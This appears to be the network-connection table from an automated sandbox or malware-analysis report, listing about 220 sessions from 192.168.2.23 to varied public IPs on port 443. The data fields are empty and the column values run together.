                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18141192.168.2.23351681.181.16.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18142192.168.2.235436660.166.225.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18143192.168.2.2335296159.32.126.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18144192.168.2.2359332223.143.141.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18145192.168.2.233349650.131.98.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18146192.168.2.2334614176.196.210.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18147192.168.2.233425670.117.124.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18148192.168.2.2343454109.253.137.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18149192.168.2.234098623.17.58.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18150192.168.2.234554451.232.101.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18151192.168.2.2347020219.236.82.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18152192.168.2.2351712208.235.250.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18153192.168.2.2335358105.71.221.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18154192.168.2.233607023.59.57.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18155192.168.2.2351392145.128.3.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18156192.168.2.2357856150.32.235.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18157192.168.2.2349980159.202.159.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18158192.168.2.2342036119.187.167.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18159192.168.2.233701245.2.62.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18160192.168.2.2332960176.140.38.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18161192.168.2.233994688.102.36.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18162192.168.2.2351986132.203.48.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18163192.168.2.2346108137.45.242.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18164192.168.2.2343862153.245.210.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18165192.168.2.235327286.22.192.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18166192.168.2.2353250206.199.130.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18167192.168.2.2346406131.74.187.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18168192.168.2.2340398217.202.242.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18169192.168.2.2341588194.241.211.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18170192.168.2.2347898134.124.207.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18171192.168.2.2335926188.196.99.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18172192.168.2.2336682157.0.93.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18173192.168.2.234197023.243.163.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18174192.168.2.2343230128.137.206.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18175192.168.2.2342024178.126.90.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18176192.168.2.2340722183.238.110.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18177192.168.2.2354610217.18.60.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18178192.168.2.233694676.142.83.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18179192.168.2.2357634163.180.104.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18180192.168.2.2355436130.170.242.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18181192.168.2.234949089.92.191.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18182192.168.2.2355524180.230.62.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18183192.168.2.2356486139.247.2.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18184192.168.2.2351982208.150.91.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18185192.168.2.235955671.239.199.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18186192.168.2.2338354141.169.107.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18187192.168.2.2338964204.147.113.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18188192.168.2.2335278165.71.111.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18189192.168.2.233428265.158.115.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18190192.168.2.234163050.147.31.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18191192.168.2.2353008209.11.31.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192192.168.2.234807098.72.205.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18193192.168.2.2345132212.246.26.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18194192.168.2.2338662175.101.139.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18195192.168.2.2358028204.147.242.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18196192.168.2.2345418156.87.171.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18197192.168.2.2335330176.136.121.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18198192.168.2.2336864166.136.148.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18199192.168.2.2339596160.64.111.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18200192.168.2.2336552158.231.226.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18201192.168.2.233947664.79.85.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18202192.168.2.2356294110.190.35.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18203192.168.2.2339090180.254.191.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18204192.168.2.2359952128.242.180.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18205192.168.2.2340842169.47.164.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18206192.168.2.2357740106.171.177.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18207192.168.2.2333548192.146.242.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18208192.168.2.2349058148.42.104.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18209192.168.2.2360286202.187.119.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18210192.168.2.2343082202.121.173.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18211192.168.2.2333528219.226.18.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18212192.168.2.235902614.220.51.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18213192.168.2.2342292132.85.225.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18214192.168.2.235504251.120.79.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18215192.168.2.2358798136.213.41.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18216192.168.2.2346688158.139.153.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18217192.168.2.234029452.133.13.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18218192.168.2.235002093.235.95.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18219192.168.2.2349986205.190.50.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18220192.168.2.2346802170.191.114.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18221192.168.2.2355856183.249.155.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18222192.168.2.2349720206.15.60.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18223192.168.2.233289266.222.65.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18224192.168.2.233966032.95.84.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18225192.168.2.2344710220.177.134.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18226192.168.2.2351780133.185.173.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18227192.168.2.234043477.119.40.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18228192.168.2.2334802124.19.1.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18229192.168.2.235119697.52.105.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18230192.168.2.235864854.16.47.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18231192.168.2.2357072223.71.230.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18232192.168.2.2349890179.98.159.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18233192.168.2.233895090.26.195.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18234192.168.2.2353022175.88.34.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18235192.168.2.234266054.175.215.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18236192.168.2.2356426189.45.221.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18237192.168.2.2354598207.82.94.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18238192.168.2.2342998182.145.148.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18239192.168.2.2334450144.6.209.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18240192.168.2.233922617.12.35.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18241192.168.2.235940272.123.168.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18242192.168.2.2347058108.99.205.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18243192.168.2.235493496.31.142.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18244192.168.2.235240824.223.90.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18245192.168.2.2345202217.50.147.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18246192.168.2.233448493.10.90.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18247192.168.2.2353544110.70.59.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18248192.168.2.2349062113.142.194.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18249192.168.2.233625820.192.148.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18250192.168.2.2339646165.214.35.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18251192.168.2.2341246143.195.43.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18252192.168.2.2356046206.59.31.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18253192.168.2.2356684159.102.200.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18254192.168.2.2340160101.135.179.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18255192.168.2.235371472.167.37.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18256192.168.2.2336354161.167.98.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18257192.168.2.2338670219.244.130.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18258192.168.2.2342850184.166.87.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18259192.168.2.235914036.53.197.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18260192.168.2.233837662.236.80.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18261192.168.2.2335646103.203.235.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18262192.168.2.234909471.188.151.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18263192.168.2.2345250171.130.156.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18264192.168.2.233772249.98.142.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18265192.168.2.2348342162.175.226.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18266192.168.2.2356028220.52.86.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18267192.168.2.235148877.40.236.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18268192.168.2.2334764134.176.75.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18269192.168.2.2346130123.145.48.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18270192.168.2.2332910109.229.138.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18271192.168.2.235019246.142.46.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18272192.168.2.2338200201.188.172.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18273192.168.2.234228096.69.221.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18274192.168.2.2340902182.240.40.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18275192.168.2.2357356130.135.136.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18276192.168.2.2333140123.242.84.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18277192.168.2.2357358138.86.61.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18278192.168.2.2344572117.21.137.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18279192.168.2.2337136110.188.168.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18280192.168.2.235913091.113.162.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18281192.168.2.235918844.73.104.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18282192.168.2.2357202109.32.98.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18283192.168.2.2356326158.44.218.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18284192.168.2.235536813.199.200.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18285192.168.2.2353772169.162.195.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18286192.168.2.235631252.246.7.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18287192.168.2.2351390123.21.242.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18288192.168.2.2357974162.1.33.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18289192.168.2.236005470.8.14.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18290192.168.2.234780424.249.104.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18291192.168.2.2346064155.199.187.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18292192.168.2.234299878.14.215.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18293192.168.2.233789099.89.80.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18294192.168.2.2347344209.80.228.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18295192.168.2.2342888216.252.131.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18296192.168.2.234885682.252.15.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18297192.168.2.2345300161.137.246.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18298192.168.2.234123624.170.95.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18299192.168.2.235550812.57.76.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18300192.168.2.2348044198.114.96.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18301192.168.2.2353958146.164.2.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18302192.168.2.2345020143.125.90.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18303192.168.2.234618699.85.77.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18304192.168.2.233884427.106.190.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18305192.168.2.234160853.87.70.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18306192.168.2.235975020.53.210.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18307192.168.2.2356270180.201.14.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18308192.168.2.2351484128.141.123.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18309192.168.2.234181264.93.180.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18310192.168.2.2346754194.3.195.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18311192.168.2.235568449.201.165.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18312192.168.2.2341992136.31.122.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18313192.168.2.2339730117.129.78.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18314192.168.2.2348492128.237.104.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18315192.168.2.234920876.191.108.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18316192.168.2.2336828208.227.71.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18317192.168.2.235232418.43.83.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18318192.168.2.2350402152.140.97.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18319192.168.2.2348266152.161.31.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18320192.168.2.235153271.85.90.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18321192.168.2.23459585.140.98.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18322192.168.2.234671427.153.131.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18323192.168.2.2341068121.31.45.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18324192.168.2.2355646188.173.157.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18325192.168.2.234655267.101.137.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18326192.168.2.234822880.87.142.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18327192.168.2.2351722186.255.147.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18328192.168.2.2339872123.28.79.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18329192.168.2.235348687.154.232.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18330192.168.2.235515493.106.52.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18331192.168.2.235351627.12.196.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18332192.168.2.2344814183.141.195.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18333192.168.2.2351166139.218.208.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18334192.168.2.2360416175.111.123.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18335192.168.2.2350684195.159.233.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18336192.168.2.2350618142.15.112.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18337192.168.2.2359648184.13.252.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18338192.168.2.2345950109.106.85.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18339192.168.2.236010845.239.175.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18340192.168.2.2333878133.46.43.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18341192.168.2.2352704106.100.180.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18342192.168.2.235943694.0.218.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18343192.168.2.2354534219.178.167.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18344192.168.2.235510459.56.123.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18345192.168.2.2336200169.148.121.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18346192.168.2.2347036193.193.233.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18347192.168.2.234683071.70.191.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18348192.168.2.2336740186.89.148.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18349192.168.2.2357826119.35.75.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18350192.168.2.2360358133.100.71.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18351192.168.2.2339050182.167.198.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18352192.168.2.2343706118.64.89.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18353192.168.2.2353806142.203.249.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18354192.168.2.235932257.12.26.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18355192.168.2.2351152151.47.232.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18356192.168.2.2338110123.66.2.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18357192.168.2.2338600204.237.254.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18358192.168.2.2346262151.40.136.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18359192.168.2.23491545.49.8.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18360192.168.2.235030064.107.228.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18361192.168.2.2351746164.110.252.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
